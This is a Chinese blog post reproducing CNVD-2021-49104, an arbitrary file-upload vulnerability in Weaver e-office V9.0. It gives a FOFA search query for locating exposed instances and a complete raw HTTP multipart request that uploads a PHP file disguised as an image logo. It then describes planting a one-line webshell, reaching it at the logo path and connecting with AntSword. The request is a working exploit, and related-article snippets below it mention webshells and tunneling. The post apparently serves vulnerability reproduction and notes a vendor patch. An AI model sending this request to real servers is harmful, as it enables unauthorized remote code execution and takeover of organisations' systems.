CNVD-2021-49104——泛微E-Office文件上传漏洞

最新推荐文章于 2024-04-08 18:16:50 发布
最新推荐文章于 2024-04-08 18:16:50 发布
阅读量8.2k 收藏 20
点赞数 16
分类专栏: 漏洞验证及复现 文章标签: CNVD-2021-49104 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44309905/article/details/121588557
版权

CNVD-2021-49104

漏洞描述

泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。
在这里插入图片描述

危害等级

  • 高危
  • 文件上传可直接get webshell

FOFA 语法

app="泛微-EOffice"

在这里插入图片描述

影响版本

泛微e-office V9.0

漏洞复现

构造请求上传文件即可

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo(test);?>

--e64bdf16c554bbc109cecef6451c26a4--

上传一句话
在这里插入图片描述

上传成功后访问 /images/logo/logo-eoffice.php
在这里插入图片描述
蚁剑连接
在这里插入图片描述
在这里插入图片描述

修复建议

厂商已提供漏洞修补方案,建议用户下载使用:http://v10.e-office.cn/eoffice9update/safepack.zip

参考

https://www.cnvd.org.cn/flaw/show/CNVD-2021-49104

https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQ
李白你好
关注
  • 16
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
泛微eoffice10最新版
07-20
泛微E-OFFIEC OA标准版 V10.0 全套官方安装包 全功能版本,总共106M,亲测可用!
trao(react/微信小程序)中通过uploadFile调用Bos(PostObject)直接上传
weixin_41792662的博客
01-26 429
trao(react/微信小程序)中通过uploadFile调用Bos(PostObject)直接上传
技术分享|某办公系统代码执行漏洞分析及检测优化
最新发布
m0_46699477的博客
04-08 4207
文章主要介绍了通过跨语言的方式生成自定义的Phar文件,并且以某办公系统为例实现了检测和利用效果,大幅提升了漏洞检出率。
tp5restful API的搭建(2)
热门推荐
梦情与你的博客
12-19 1万+
同学们好,嘿嘿。最近时间比较充足。多写一些心得。大家共同探讨交流。 上一节我们聊到api的基本操作,今天我们说一下上传功能。基本的上传功能,我这里说两种方式。 首先路由设置 Route::post(':version/upload', 'api/:version.News/upload'); 一. $_FILES $_FILES[“file”][“name”] - 被上传文件的名称 $_FI...
Python Web框架——Django学习的第四天(请求以及响应,python前后端的交互)
qq_51269815的博客
12-20 840
一: Django中的请求 1.请求的方法:GET,POST,HEAD等 GET:求情指定的页面信息,并返回实体主体 HEAD:类似于get请求,只不过返回的响应中没有具体的内容,用于获取表头 POST:向指定资源提交数据进行处理请求(猎兔提交表单或者上传文件)。数据被包含在请求体中。POST请求可能会导致新的资源的建立和已有资源的修改。 2.django中的请求 请求就是在Django中视图函数的第一个参数,即HttpRequest对象 Django接收到http协议的请求后,会根据请求数据报
黑客?1小时内入侵100台服务器,百度成为帮凶?!
qq_18357975的博客
05-31 1268
最近有一位朋友搭建了一个商城,想让我帮他测试一下,于是有了这篇文章。 公众号中发送:AI小子,将获得一个AI学习大礼包的推送。 背景说明 “前几天,一个朋友通过QQ找到我,他说是通过一个百度云的搜索软件搜到了我分享的“漏洞扫描软件”,顺着软件上面的QQ找到我的,想让我帮忙测试下他的商城。本来是拒绝的,但是想到别人都专门找到我,还是帮他测试下吧,顺便加个餐(为了不给该用户带来麻烦,接下来在文章中出现的网址我都会进行打码)” 通过阅读这篇文章你会了解到入侵的整个流程:如何利用网站的漏洞,一步步拿下服务器权限.
CNVD-2021-49104漏洞复现(泛微E-Office文件上传漏洞
dreamthe的博客
12-05 2449
1.靶场搭建 自己下载的e-office软件运行就行了
漏洞复现--泛微E-Office 10任意文件上传漏洞
qq_53003652的博客
10-07 2192
泛微E-Office 10在 10.0_20230821 版本之前存在远程代码执行漏洞,该漏洞是通过文件上传配合文件包含实现远程代码执行,攻击者可利用此漏洞上传恶意文件并控制服务器。长亭应急团队经过分析后发现该漏洞是通过文件上传配合文件包含实现远程代码执行。近期,长亭科技监测到泛微官方发布了新补丁修复了一处远程代码执行漏洞
泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
Ms08067安全实验室
12-14 5974
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...
泛微 E-Office 文件上传Getshell
w2411313的博客
12-01 1136
10.在Neo-reGeorg-3.8.0中执行python3 neoreg.py -k w2411313 -u。4.在哥斯拉命令执行栏,输入whoami显示system,具有添加账户密码与添加管理员组权限,执行且添加成功.3.在命令执行一栏输入命令,显示注入哥斯拉木马,利用哥斯拉进行连接,连接成功。8.找到网站根目录,将生成的php文件进行上传搭建通信隧道,进行内网穿透。5.输入ipconfig,发现是内网IP,需要进行内网穿透。6.执行Neo-reGeorg-3.8.0来搭建通信隧道。
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Thinkergod#PeiQi-WIKI-POC#若依管理系统 后台任意文件读取 CNVD-2021-019312
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
web项目文件上传实现
qq_43437044的博客
04-21 331
文件上传 @PostMapping("/uploadfile") @ApiOperation(notes = "教师上传教学资料",value = "传入文件") @ResponseBody @CrossOrigin public Re uploadfile(@RequestParam(value="file") MultipartFile file,HttpServletRequest httpServletRequest){ if (file.is.
office前台任意文件上传漏洞分析
HBohan的博客
12-15 1338
office前台任意文件上传漏洞分析
(php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)
叶子的Blog
12-03 6481
漏洞描述 泛微e-office泛微旗下的一款标准协同移动办公平台。 CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。 该漏洞CVSS评分:9.0,危害等级:高危 FOFA 查询 app="泛微-EOffice" 影响范围 影响版本:泛微e-office V9.0 代码分析 出现问题的代码在/general/index/UploadFile.php文件中,具体位置是 if ($u
cnvd-2021-16886 利用脚本
07-07
### 回答1: cnvd-2021-16886是一个漏洞编号,代表某个具体的漏洞。利用脚本是指通过编写特定的代码脚本来利用该漏洞。 在利用cnvd-2021-16886漏洞时,可以通过编写脚本来自动化攻击过程,提高攻击效率和成功率。脚本可以使用各种编程语言编写,比如Python、Ruby、Perl等,根据具体需求来选择适合的编程语言。 脚本的编写可以包括以下步骤: 1. 了解漏洞:仔细研究cnvd-2021-16886漏洞的细节和原理,了解漏洞的利用方式和可能造成的影响。 2. 分析目标:确定攻击的目标,包括具体运行漏洞的应用、系统版本等信息。 3. 编写代码:根据漏洞的利用方式和目标的特点,编写相关代码段。这些代码段可能包含如发送特定的恶意请求以触发漏洞、获取目标系统的权限等功能。 4. 测试和优化:在合适的环境下测试编写的脚本,确保其能够成功利用cnvd-2021-16886漏洞。如果有问题或不完善的地方,需要进行调试和优化。 需要注意的是,利用漏洞是非法的行为,可能会导致法律问题和伦理问题。在进行漏洞利用时,应遵守法律法规并获得合法授权,比如在合法的渗透测试范围内进行。 ### 回答2: cnvd-2021-16886 是一个漏洞标识符,用于标识2021年的一个特定漏洞。根据我的了解,我将用300字的篇幅来回答利用这一漏洞的脚本。 cnvd-2021-16886 是一种远程代码执行漏洞,该漏洞存在于某个软件的特定版本中。通过利用这一漏洞,攻击者可以执行恶意代码,并可能获取对受影响系统的控制。 要利用这一漏洞,攻击者可以使用特定的脚本代码来构造定制的攻击载荷。这个脚本可能会利用漏洞中存在的软件错误,以执行恶意代码或利用系统的弱点。攻击者可以通过网络将这个攻击载荷发送到受影响的系统,从而实现攻击的目的。 脚本通常是用编程语言编写的一组指令,用于自动执行一系列任务。在利用 cnvd-2021-16886 漏洞时,攻击者可能会创建一个定制的脚本,以利用漏洞中存在的软件错误。这个脚本可能包含诸如代码注入、命令执行、文件包含等恶意操作,以便攻击者获取对系统的完全控制或进行其他恶意活动。 为了保护受影响的系统免受这一漏洞的攻击,管理员们应该立即采取行动。这包括及时升级软件以修复漏洞,或者使用补丁程序来修复软件中的错误。此外,还应增加系统的安全性,例如通过配置防火墙、加密通信和访问控制等手段来加强系统防御能力。 总之,通过利用脚本来利用 cnvd-2021-16886 漏洞,攻击者可以执行恶意代码并可能获取对受影响系统的控制。为了保护系统安全,及时修复漏洞并加强系统的安全配置是必要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李白你好

年轻人,少吐槽,多搬砖

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值